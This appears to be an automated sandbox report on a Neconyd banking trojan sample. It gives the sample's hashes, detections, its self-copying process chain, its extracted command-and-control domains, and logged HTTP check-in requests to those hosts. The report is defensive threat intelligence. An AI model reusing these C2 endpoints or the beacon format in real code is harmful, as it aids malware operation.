Windows Analysis Report
cOviNFmw21.exe

Overview

General Information

Sample name: cOviNFmw21.exe (renamed because the original name is a hash value)
Original sample name: 7a492eaf1df94ad3ffea031e184f81099ed752dce08e77aba9ed657ead97dc3f.exe
Analysis ID: 1569326
MD5: 73e5f0f01bf8368b8b82432b027610e5
SHA1: ecf068b47a2747e0ef0286c6f9d03f2f8aacfaa7
SHA256: 7a492eaf1df94ad3ffea031e184f81099ed752dce08e77aba9ed657ead97dc3f
Tags: exe, user-adrian__luca

Detection

Neconyd
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Neconyd
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops executables to the windows directory (C:\Windows) and starts them
Machine Learning detection for dropped file
Machine Learning detection for sample
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain (may stop execution after checking a module file name)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • cOviNFmw21.exe (PID: 5344 cmdline: "C:\Users\user\Desktop\cOviNFmw21.exe" MD5: 73E5F0F01BF8368B8B82432B027610E5)
    • omsecor.exe (PID: 3808 cmdline: C:\Users\user\AppData\Roaming\omsecor.exe MD5: 9CB842FFDA5CC91A433FD8C8655C0678)
      • omsecor.exe (PID: 1732 cmdline: C:\Windows\System32\omsecor.exe MD5: 647527DE20AF8BB173C26019E8811EED)
        • omsecor.exe (PID: 6904 cmdline: C:\Windows\SysWOW64\omsecor.exe /nomove MD5: 647527DE20AF8BB173C26019E8811EED)
  • cleanup

Malware Configuration

{"C2 url": ["http://mkkuei4kdsz.com/", "http://lousta.net/", "http://ow5dirasuek.com/"]}

Yara Overview

Source | Rule | Description | Author | Strings
Process Memory Space: cOviNFmw21.exe PID: 5344 | JoeSecurity_Neconyd | Yara detected Neconyd | Joe Security |
Process Memory Space: omsecor.exe PID: 3808 | JoeSecurity_Neconyd | Yara detected Neconyd | Joe Security |
Process Memory Space: omsecor.exe PID: 1732 | JoeSecurity_Neconyd | Yara detected Neconyd | Joe Security |
Process Memory Space: omsecor.exe PID: 6904 | JoeSecurity_Neconyd | Yara detected Neconyd | Joe Security |

Sigma Overview

No Sigma rule has matched

Suricata Overview

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-05T18:04:08.431834+0100 | 2016998 | 1 | A Network Trojan was detected | 192.168.2.7 | 49699 | 193.166.255.171 | 80 | TCP
2024-12-05T18:04:36.659257+0100 | 2018141 | 1 | A Network Trojan was detected | 52.34.198.229 | 80 | 192.168.2.7 | 49748 | TCP
2024-12-05T18:04:36.659257+0100 | 2037771 | 1 | A Network Trojan was detected | 52.34.198.229 | 80 | 192.168.2.7 | 49748 | TCP
2024-12-05T18:04:10.619663+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49699 | 193.166.255.171 | 80 | TCP
2024-12-05T18:04:32.754783+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49700 | 193.166.255.171 | 80 | TCP
2024-12-05T18:04:34.471615+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49742 | 15.197.204.56 | 80 | TCP
2024-12-05T18:04:36.659210+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49748 | 52.34.198.229 | 80 | TCP
2024-12-05T18:04:59.095440+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49754 | 193.166.255.171 | 80 | TCP
2024-12-05T18:05:21.253614+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49803 | 193.166.255.171 | 80 | TCP
2024-12-05T18:05:22.615655+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49851 | 15.197.204.56 | 80 | TCP
2024-12-05T18:05:24.218147+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49857 | 52.34.198.229 | 80 | TCP
2024-12-05T18:05:46.346450+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49862 | 193.166.255.171 | 80 | TCP
2024-12-05T18:06:08.472191+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49913 | 193.166.255.171 | 80 | TCP
2024-12-05T18:06:09.821016+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49965 | 15.197.204.56 | 80 | TCP
2024-12-05T18:06:11.428062+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49969 | 52.34.198.229 | 80 | TCP

AV Detection

Source: cOviNFmw21.exe | Avira: detected
Source: http://lousta.net/54/325.html | Avira URL Cloud: Label: phishing
Source: http://mkkuei4kdsz.com/402/288.htmle | Avira URL Cloud: Label: phishing
Source: http://mkkuei4kdsz.com/ | Avira URL Cloud: Label: phishing
Source: http://mkkuei4kdsz.com/402/288.html-8a8d424fbe43573ef1LMEM | Avira URL Cloud: Label: phishing
Source: http://lousta.net/115/685.html53 | Avira URL Cloud: Label: phishing
Source: http://lousta.net/352/26.html | Avira URL Cloud: Label: phishing
Source: http://lousta.net/352/26.htmls0 | Avira URL Cloud: Label: phishing
Source: http://lousta.net/158/950.html | Avira URL Cloud: Label: phishing
Source: http://mkkuei4kdsz.com/697/241.html | Avira URL Cloud: Label: phishing
Source: http://lousta.net/616/595.html | Avira URL Cloud: Label: phishing
Source: http://mkkuei4kdsz.com/697/241.htmll | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/56/763.html | Avira URL Cloud: Label: phishing
Source: http://mkkuei4kdsz.com/910/77.htmlCj | Avira URL Cloud: Label: phishing
Source: http://lousta.net/352/26.html3418276 | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/372/940.htmlj | Avira URL Cloud: Label: phishing
Source: http://mkkuei4kdsz.com/697/241.htmlasuek.com | Avira URL Cloud: Label: phishing
Source: http://mkkuei4kdsz.com/697/241.html/ | Avira URL Cloud: Label: phishing
Source: http://mkkuei4kdsz.com/i | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/56/763.htmlWI/ | Avira URL Cloud: Label: phishing
Source: http://lousta.net/115/685.html | Avira URL Cloud: Label: phishing
Source: http://lousta.net/352/26.htmlz0o | Avira URL Cloud: Label: phishing
Source: http://lousta.net/ | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/618/507.html; | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/56/763.htmluj | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/618/507.html | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/lousta.net | Avira URL Cloud: Label: phishing
Source: http://lousta.net/54/325.htmlwshqos.dll.mui | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/618/507.html% | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodcon | Avira URL Cloud: Label: phishing
Source: http://lousta.net/j | Avira URL Cloud: Label: phishing
Source: http://mkkuei4kdsz.com/910/77.htmlIIM | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/372/940.html | Avira URL Cloud: Label: phishing
Source: http://lousta.net/594/342.html | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/ta | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/en-US | Avira URL Cloud: Label: phishing
Source: http://mkkuei4kdsz.com/910/77.html0#= | Avira URL Cloud: Label: phishing
Source: http://mkkuei4kdsz.com/910/77.html$# | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/ | Avira URL Cloud: Label: phishing
Source: http://lousta.net/562/345.html | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/56/763.htmlEIY | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/56/763.html-F | Avira URL Cloud: Label: phishing
Source: http://ow5dirasuek.com/56/763.html% | Avira URL Cloud: Label: phishing
Source: http://mkkuei4kdsz.com/910/77.html | Avira URL Cloud: Label: phishing
Source: http://mkkuei4kdsz.com/697/241.html~x | Avira URL Cloud: Label: phishing
Source: http://mkkuei4kdsz.com/402/288.html | Avira URL Cloud: Label: phishing
Source: http://lousta.net/352/26.htmle1N | Avira URL Cloud: Label: phishing
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Avira: detection malicious, Label: HEUR/AGEN.1317135
Source: C:\Windows\SysWOW64\omsecor.exe | Avira: detection malicious, Label: HEUR/AGEN.1317135
Source: cOviNFmw21.exe | Malware Configuration Extractor: Neconyd {"C2 url": ["http://mkkuei4kdsz.com/", "http://lousta.net/", "http://ow5dirasuek.com/"]}
Source: C:\Users\user\AppData\Roaming\omsecor.exe | ReversingLabs: Detection: 95%
Source: cOviNFmw21.exe | ReversingLabs: Detection: 97%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\omsecor.exe | Joe Sandbox ML: detected
Source: cOviNFmw21.exe | Joe Sandbox ML: detected
Source: cOviNFmw21.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\cOviNFmw21.exe | Code function: 1_2_0040ABD9 FindFirstFileW,FindClose,1_2_0040ABD9
Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 11_2_0040ABD9 FindFirstFileW,FindClose,11_2_0040ABD9

Networking

Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:49699 -> 193.166.255.171:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:49742 -> 15.197.204.56:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:49700 -> 193.166.255.171:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:49748 -> 52.34.198.229:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:49803 -> 193.166.255.171:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:49851 -> 15.197.204.56:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:49754 -> 193.166.255.171:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:49857 -> 52.34.198.229:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:49862 -> 193.166.255.171:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:49913 -> 193.166.255.171:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:49969 -> 52.34.198.229:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.7:49965 -> 15.197.204.56:80
Source: Malware configuration extractor | URLs: http://mkkuei4kdsz.com/
Source: Malware configuration extractor | URLs: http://lousta.net/
Source: Malware configuration extractor | URLs: http://ow5dirasuek.com/
Source: global traffic | HTTP traffic detected:
    GET /616/595.html HTTP/1.1
    From: 133778918465242887
    Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A1594h:2g7c:e6ef48545gf:5a:;0547;
    Host: lousta.net
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /616/595.html HTTP/1.1
    From: 133778918465242887
    Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A1594h:2g7c:e6ef48545gf:5a:;0547;
    Host: lousta.net
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /616/595.html HTTP/1.1
    From: 133778918465242887
    Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A1594h:2g7c:e6ef48545gf:5a:;0547;
    Host: lousta.net
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /562/345.html HTTP/1.1
    From: 133778918465242887
    Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A1594h:2g7c:e6ef48545gf:5a:;0547;
    Host: lousta.net
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /910/77.html HTTP/1.1
    From: 133778918465242887
    Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A1594h:2g7c:e6ef48545gf:5a:;0547;
    Host: mkkuei4kdsz.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /56/763.html HTTP/1.1
    From: 133778918465242887
    Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A1594h:2g7c:e6ef48545gf:5a:;0547;
    Host: ow5dirasuek.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /115/685.html HTTP/1.1
    From: 133778973683427860
    Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w</460_`a7a1c4._7`/`_70,`a14`]_ca.
    Host: lousta.net
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /54/325.html HTTP/1.1
    From: 133778973683427860
    Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w</460_`a7a1c4._7`/`_70,`a14`]_ca.
    Host: lousta.net
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /402/288.html HTTP/1.1
    From: 133778973683427860
    Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w</460_`a7a1c4._7`/`_70,`a14`]_ca.
    Host: mkkuei4kdsz.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /372/940.html HTTP/1.1
    From: 133778973683427860
    Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w</460_`a7a1c4._7`/`_70,`a14`]_ca.
    Host: ow5dirasuek.com
    Connection: Keep-Alive
    Cookie: snkz=8.46.123.228; btst=53bc98c7fd76f7846aa5411ec8e5a6dc|8.46.123.228|1733418276|1733418276|0|1|0
Source: global traffic | HTTP traffic detected:
    GET /158/950.html HTTP/1.1
    From: 133778973683427860
    Via: bjledplYpdq;6+3]^mc`;4Yn`m_l80/+./.0]jq<10/,\j`w</460_`a7a1c4._7`/`_70,`a14`]_ca.
    Host: lousta.net
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /352/26.html HTTP/1.1
    From: 133778973683427860
    Via: bjledplYpdq;6+3]^mc`;4Yn`m_l80/+./.0]jq<10/,\j`w</460_`a7a1c4._7`/`_70,`a14`]_ca.
    Host: lousta.net
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /697/241.html HTTP/1.1
    From: 133778973683427860
    Via: bjledplYpdq;6+3]^mc`;4Yn`m_l80/+./.0]jq<10/,\j`w</460_`a7a1c4._7`/`_70,`a14`]_ca.
    Host: mkkuei4kdsz.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /618/507.html HTTP/1.1
    From: 133778973683427860
    Via: bjledplYpdq;6+3]^mc`;4Yn`m_l80/+./.0]jq<10/,\j`w</460_`a7a1c4._7`/`_70,`a14`]_ca.
    Host: ow5dirasuek.com
    Connection: Keep-Alive
    Cookie: snkz=8.46.123.228; btst=53bc98c7fd76f7846aa5411ec8e5a6dc|8.46.123.228|1733418323|1733418276|23|2|0
Source: Joe Sandbox View | IP Address: 193.166.255.171
Source: Joe Sandbox View | IP Address: 52.34.198.229
Source: Joe Sandbox View | ASN Name: FUNETASFI
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: Joe Sandbox View | ASN Name: TANDEMUS
Source: Network traffic | Suricata IDS: 2016998 - Severity 1 - ET MALWARE Connection to Fitsec Sinkhole IP (Possible Infected Host) : 192.168.2.7:49699 -> 193.166.255.171:80
Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.34.198.229:80 -> 192.168.2.7:49748
Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.34.198.229:80 -> 192.168.2.7:49748
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\cOviNFmw21.exe | Code function: 1_2_00407036 DeleteFileW,CreateFileW,GetLastError,SetEndOfFile,InternetOpenUrlW,CloseHandle,InternetQueryDataAvailable,InternetReadFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,1_2_00407036
Source: global traffic | DNS traffic detected: DNS query: lousta.net
Source: global traffic | DNS traffic detected: DNS query: mkkuei4kdsz.com
Source: global traffic | DNS traffic detected: DNS query: ow5dirasuek.com
Source: omsecor.exe, 00000002.00000002.1551324123.00000000005A0000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000F.00000002.2499073566.0000000000195000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/
Source: omsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/115/685.html
Source: omsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/115/685.html53
Source: omsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/158/950.html
Source: omsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/352/26.html
Source: omsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/352/26.html3418276
Source: omsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/352/26.htmle1N
Source: omsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/352/26.htmls0
Source: omsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/352/26.htmlz0o
Source: omsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/54/325.html
Source: omsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/54/325.htmlwshqos.dll.mui
Source: omsecor.exe, 00000002.00000002.1551324123.00000000005A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/562/345.html
Source: omsecor.exe, 0000000F.00000002.2500201090.0000000000640000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000F.00000002.2499073566.0000000000195000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 0000000F.00000002.2500201090.00000000005FA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/594/342.html
Source: omsecor.exe, 00000002.00000002.1551324123.000000000055E000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.1551324123.00000000005A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/616/595.html
Source: omsecor.exe, 0000000F.00000002.2500201090.00000000005FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/j
Source: omsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://mkkuei4kdsz.com/
Source: omsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://mkkuei4kdsz.com/402/288.html
Source: omsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://mkkuei4kdsz.com/402/288.html-8a8d424fbe43573ef1LMEM
Source: omsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://mkkuei4kdsz.com/402/288.htmle
Source: omsecor.exe, 0000000B.00000002.2498117710.000000000051A000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://mkkuei4kdsz.com/697/241.html
Source: omsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://mkkuei4kdsz.com/697/241.html/
Source: omsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://mkkuei4kdsz.com/697/241.htmlasuek.com
Source: omsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://mkkuei4kdsz.com/697/241.htmll
Source: omsecor.exe, 0000000B.00000002.2498117710.000000000051A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://mkkuei4kdsz.com/697/241.html~x
Source: omsecor.exe, 00000002.00000002.1551324123.00000000005A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://mkkuei4kdsz.com/910/77.html
Source: omsecor.exe, 00000002.00000002.1551324123.000000000055E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://mkkuei4kdsz.com/910/77.html$#
Source: omsecor.exe, 00000002.00000002.1551324123.000000000055E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://mkkuei4kdsz.com/910/77.html0#=
Source: omsecor.exe, 00000002.00000002.1551324123.00000000005A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://mkkuei4kdsz.com/910/77.htmlCj
Source: omsecor.exe, 00000002.00000002.1551324123.00000000005A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://mkkuei4kdsz.com/910/77.htmlIIM
Source: omsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://mkkuei4kdsz.com/i
Source: omsecor.exe, 00000002.00000002.1551324123.00000000005A0000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/
Source: omsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/372/940.html
Source: omsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/372/940.htmlj
Source: omsecor.exe, 00000002.00000002.1550915229.0000000000194000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.1551324123.00000000005A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/56/763.html
Source: omsecor.exe, 00000002.00000002.1551324123.00000000005BC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/56/763.html%
Source: omsecor.exe, 00000002.00000002.1551324123.00000000005A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/56/763.html-F
Source: omsecor.exe, 00000002.00000002.1551324123.00000000005A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/56/763.htmlEIY
Source: omsecor.exe, 00000002.00000002.1551324123.00000000005A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/56/763.htmlWI/
Source: omsecor.exe, 00000002.00000002.1551324123.00000000005A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/56/763.htmluj
Source: omsecor.exe, 0000000B.00000002.2498117710.000000000051A000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 0000000B.00000002.2497707678.0000000000194000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/618/507.html
Source: omsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/618/507.html%
Source: omsecor.exe, 0000000B.00000002.2498117710.00000000004BE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/618/507.html;
Source: omsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/en-US
Source: cOviNFmw21.exe, omsecor.exe.1.dr, omsecor.exe.2.dr | String found in binary or memory: http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodcon
Source: omsecor.exe, 0000000B.00000002.2498117710.0000000000508000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/lousta.net
Source: omsecor.exe, 00000002.00000002.1551324123.00000000005A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ow5dirasuek.com/ta

E-Banking Fraud

          Source: Yara matchFile source: Process Memory Space: cOviNFmw21.exe PID: 5344, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: omsecor.exe PID: 3808, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: omsecor.exe PID: 1732, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: omsecor.exe PID: 6904, type: MEMORYSTR
Source: C:\Users\user\AppData\Roaming\omsecor.exe | File created: C:\Windows\SysWOW64\omsecor.exe
Source: C:\Windows\SysWOW64\omsecor.exe | File created: C:\Windows\SysWOW64\merocz.xc6
Source: C:\Users\user\Desktop\cOviNFmw21.exe | Code function: 1_2_0040D2A4
Source: C:\Users\user\Desktop\cOviNFmw21.exe | Code function: 1_2_0040B51C
Source: C:\Users\user\Desktop\cOviNFmw21.exe | Code function: 1_2_0040CBD0
Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 11_2_0040D2A4
Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 11_2_0040B51C
Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 11_2_0040CBD0
Source: cOviNFmw21.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.bank.troj.evad.winEXE@7/3@3/3
Source: C:\Users\user\Desktop\cOviNFmw21.exe | Code function: 1_2_0040A057 GetForegroundWindow,CoCreateInstance,SetForegroundWindow
Source: C:\Users\user\Desktop\cOviNFmw21.exe | File created: C:\Users\user\AppData\Roaming\omsecor.exe
Source: cOviNFmw21.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\cOviNFmw21.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: cOviNFmw21.exe | ReversingLabs: Detection: 97%
Source: C:\Users\user\Desktop\cOviNFmw21.exe | File read: C:\Users\user\Desktop\cOviNFmw21.exe
Source: C:\Users\user\Desktop\cOviNFmw21.exe | Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess (graph_1-3557)
Source: C:\Windows\SysWOW64\omsecor.exe | Evasive API call chain: GetCommandLine,DecisionNodes,ExitProcess (graph_11-3558)
Source: unknown | Process created: C:\Users\user\Desktop\cOviNFmw21.exe "C:\Users\user\Desktop\cOviNFmw21.exe"
Source: C:\Users\user\Desktop\cOviNFmw21.exe | Process created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exe
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Process created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\System32\omsecor.exe
Source: C:\Windows\SysWOW64\omsecor.exe | Process created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\SysWOW64\omsecor.exe /nomove
